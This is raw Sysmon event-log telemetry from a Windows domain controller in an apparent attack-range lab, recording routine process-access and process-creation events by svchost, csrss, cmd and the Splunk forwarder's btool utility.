13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6500-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8555-5FCF-6400-000000009101}39524000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8555-5FCF-6500-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.082{10ACEC4A-8555-5FCF-6500-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8555-5FCF-6400-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6400-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6400-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8555-5FCF-6300-000000009101}39803992C:\Windows\system32\cmd.exe{10ACEC4A-8555-5FCF-6400-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.077{10ACEC4A-8555-5FCF-6400-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8555-5FCF-6300-000000009101}3980C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6300-000000009101}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 